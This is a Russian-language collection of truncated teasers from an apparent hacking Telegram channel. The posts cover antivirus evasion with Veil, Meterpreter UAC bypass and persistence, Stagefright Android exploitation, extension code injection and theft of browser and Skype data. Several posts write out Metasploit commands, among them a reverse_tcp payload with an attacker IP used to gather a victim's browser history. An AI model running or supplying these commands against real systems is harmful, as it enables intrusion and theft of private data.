t.me/webware Всем привет! В этой небольшой статье, я бы хотел сообщить тем, кто не в курсе, что поддержка Veil Evasion закончилась, и на его место пришел обновленный фреймворк Veil. Установим его, со страницы разработчиков на Github. > git clone https://github.com/Veil-Framework/Veil > cd Veil/ > cd setup/ > ./setup.py –h > ./setup.py –c Далее, следуя подсказкам, устанавливаем необходимые для работы фреймворка, инструменты. Запуск фреймворка: > ./Veil Фреймворк, на данный момент содержит два инструмента:…

t.me/webware Всем привет! В этой статье я бы хотел описать один важный прием в работе с Meterpreter’ом. А в частности: Способ повышения привилегий до системных, обход UAC на удаленном компьютере (жертве).  В этой статье будет описано два таких способа. Оба успешно проверены на операционных системах - Windows 8.1, Windows 10. Итак, по порядку – UAC и привилегии. Если коротко, то UAC Контроль учетных записей пользователей – это функция, которая появилась еще в Windows Vista с тех пор «окна» она не покидает…

t.me/webware Приветствую всех! В этой короткой статье речь пойдет о том, как слить себе логи Skype, историю посещений Chrome и Firefox с удаленного компьютера жертвы. Как и в предыдущей статье нам необходима открытая сессия meterpreter с повышенными привилегиями. Затем выполняем по порядку команды ниже: > background > use post/windows/gather/forensics/browser_history > set payload windows/meterpreter/reverse_tcp > set lhost 192.168.1.6 (IP атакующего) > set session 1 > exploit Вся информация сохранилась в …

t.me/webware Привет! Здесь пойдет речь о том как использовать VNC -сервер на удаленном компьютере. Что такое VNC и зачем он нам нужен? Немного теории: Virtual Network Computing (VNC) — система удалённого доступа к рабочему столу компьютера, использующая протокол RFB (Remote FrameBuffer, удалённый кадровый буфер). Управление осуществляется путём передачи нажатий клавиш на клавиатуре и движений мыши с одного компьютера на другой и ретрансляции содержимого экрана через компьютерные сети. Сразу оговорюсь, что…

t.me/webware Эта статья является дополнением ранее опубликованной на codeby: Уязвимость GnuPG в инструментах шифрования позволяет злоумышленникам подделать чью-либо подпись На прошлой неделе исследователи обнаружили уязвимости в большом количестве зашифрованных почтовых клиентов: в частности, те, которые используют OpenPGP и S/MIME, включая Thunderbird и AppleMail. Это серьезные уязвимости: злоумышленник, который может изменять почту, отправленную уязвимому клиенту, может обмануть этого клиента, а именно убедить…

t.me/webware В этом посте я продемонстрирую обход DEP/NX, используя обратно ориентированное программирование.

t.me/webware Кластеризация вредоносных программ с открытым исходным кодом: Cosa Nostra Презентация Cosa Nostra Скачать Cosa Nostra Cosa Nostra — это инструментарий для кластеризации программного обеспечения с открытым исходным кодом с акцентом на анализ вредоносных программ. Он может создавать филогенетические деревья бинарных образцов вредоносных программ, которые структурно схожи. Первоначально он был выпущен во время SyScan360 Shanghai (2016). Необходимые сторонние инструменты Для использования Cosa Nostra…

t.me/webware Мультиплатформенный двоичный анализ с открытым исходным кодом: BARF Project Анализ бинарного кода является важнейшей задачей во многих областях компьютерных наук и программных дисциплин, начиная от защиты программного обеспечения и анализа программ до обратного проектирования. Ручной двоичный анализ — сложная и трудоемкая задача, и существуют программные средства, которые стремятся автоматизировать процесс или помочь аналитикам. Однако, большинство этих инструментов имеют ряд технических и коммерческих…

t.me/webware И снова здравствуйте! Данный материал будет посвящен инструменту, позволяющему вносить изменения в расширения для браузера, наделяя их недокументированными возможностями. Cromos - это инструмент для загрузки расширений из интернет-магазина Chrome и инъекции в них своего кода. Есть возможность создания собственных исполняемых файлов и функция размещения файлов в Dropbox. Функционал: · Загрузка расширения · Инъекция кода · Загрузка файлов в Dropbox · Заражение ОС семейства Windows Установка: > git…

t.me/webware Снова приветствую всех , как и планировал , выкладываю информацию о ещё одной новинке. Скрипт написан p5yph3r и по мнению этого автора , должен облегчить жизнь администраторам. Ну а где администраторы ,там и .. Он очень быстро работает,прост в обращении до безобразия. В его функции заложена автоматизация python для перечисления. Используются поисковые системы google, bing, yahoo, baidu Кроме этого , присуттсвует DNS-Dumpster ,что упрощает процедуру исследования. Установка: # git clone https:/…

t.me/webware Добрый день,Уважаемые Форумчане и Друзья. Совершенно лёгкий обзор будет посвящён скрипту,который помогает добыть персональную информацию. Написан он человеком с ником illwill. skiptracer призван находить взаимосвязи имя-телефон-email. Это ещё одна утилита,к которой можно относиться по-разному. Моё мнение-она больше подходит для поиска информации о известных личностях. Пользуется скрипт открытыми источниками и пытается систематизировать и отфильтровать данные. Авторская задумка была, взять лучшее…

t.me/webware Приветствую Уважаемых Форумчан и Друзей. Поговорим сегодня о амбициозном framework Который был создан theinfecteddrake недавно. Работа очень объёмная и впечатляющая. В инструмент заложены 73 различных модуля,ориентированных на пентест. Также,много уделено внимания по сбору информации,детекту защитных систем ресурсов. Проще наверное перечислить чего в этом монстре нет. Модули: Reconnaissance + OSINT Passive Reconnaissance: Ping/Nping Enumeration WhoIS Lookup GeoIP Lookup DNS Config. Lookup Subdomains…

t.me/webware Приветствую! В этой статье речь пойдет об инструменте, который, по словам автора, способен значительно упростить пентестеру жизнь, полностью автоматизировав, сканирование хоста и подбор необходимых эксплоитов. К тому же в нем используется Машинное Обучение. Машинное обучение — класс методов искусственного интеллекта, характерной чертой которых является не прямое решение задачи, а обучение в процессе применения решений множества сходных задач. Для построения таких методов используются средства математической…

t.me/webwareЭто продолжение статьи о Deep Exploit, инструменте, который, по словам автора, способен значительно упростить пентестеру жизнь, полностью автоматизировав, сканирование хоста и подбор необходимых эксплоитов.Ссылка на первую часть. Структура работы Deep Exploit в Интеллектуальном режиме: Шаг 1. Сканирование портов на тренировочных серверах. Deep Exploit собирает информацию, такую как тип ОС, номера открытых портов, версия ядра и так далее. После сканирования портов он выполняет две команды Metasploit…

t.me/webware Приветствую всех, жителей и гостей форума, в одной из моих предыдущих статей, а именно тут. Я показал, как установить и довольно успешно пользоваться замечательным инструментом Deep Exploit, он включает в себя машинное обучение, нейросеть TensorFlow и ну и кучу всего разного, в статье все описано, рекомендую прочесть. В самом конце, статьи Deep Exploit успешно применял эксплойты на виртуальной машине Metasploitable 2, сессии открывались, отчеты формировались (правда, не совсем, так как ожидалось…

t.me/webware Приветствую. На официальном сайте описывался весь процесс: Filter Replacement - OsmocomBB - Open Source Mobile Communications. Здесь я опишу свой опыт перепайки. Перепайка фильтров нужна для того, что бы телефон мог слушать весь gsm-трафик вокруг себя (стандартные фильтры отбрасывают весь входящий трафик, не принадлежащий этому телефону). Это может понадобиться, например, при снифинге gsm.Если кто-то не понял о чём идёт речь, попрошу перейти на форум и почитать здесь Может встать вопрос: почему…

t.me/webware Хочу поделиться с вами, как можно получить доступ к телефону на базе андройд используя вредоносную ссылку, сразу оговорюсь , данный метод работает на старых версиях андройд. И так поехали...  Для этого мы будем использовать эксплойт Stagefright. Запускаем метасплойт командой msfconsole. Дальше все делаем согласно скринам, я думаю так будет более понятно. Указываем IP атакующего компа,порт,и другие данные...кто не знает свой ip, это можно сделать командой: ifconfig После запуска эксплойта, сгенерируется…

t.me/webware Всем привет! В этой статье я покажу, как с помощью Metasploit получить информацию о сохраненных сессиях PuTTY на целевом хосте. Используемый мною модуль определит, запущен ли Pageant и получает ли он информацию о сохраненных сессиях из реестра и соберет все доступные данные. Pageant - это приложение, входящее в утилиту PuTTY. Это программное обеспечение используется для хранения приватных ключей в памяти в раскодированном виде, которые используются при запросе удаленного сервера. Так же с помощью…

t.me/webware Привет! В данной публикации, я покажу, как осуществить постоянный доступ к уязвимому, к примеру, посредством reverse shell (meterpreter) компьютеру. В роли атакующей системы Kali Linux 2016.2 с адресом в локальной сети 192.168.0.101 и целевой хост – Windows 8.1. с адресом в локальной сети 192.168.0.109. Итак, нам понадобится открытая сессия meterpreter: Для продолжения, необходимо обойти UAC на целевом хосте: > use exploit/windows/local/bypassuac_injection И по порядку выполняем команды, как показано…

t.me/webware Всем привет! В этой публикации я хочу поделиться с вами информацией о проекте российских разработчиков. Проект носит название Razboynik (Разбойник) и, по мнению авторов, призван стать лидером в плане использования уязвимостей PHP-скриптов. Как пишут разработчики, предыдущие версии инструмента, были, громоздкими и требовали точной настройки и плюс ко всему ее сложно, было осуществить. Разбойник был разработан, чтобы решить эти проблемы. Основные моменты: Он легко устанавливается (об этом чуть позже)…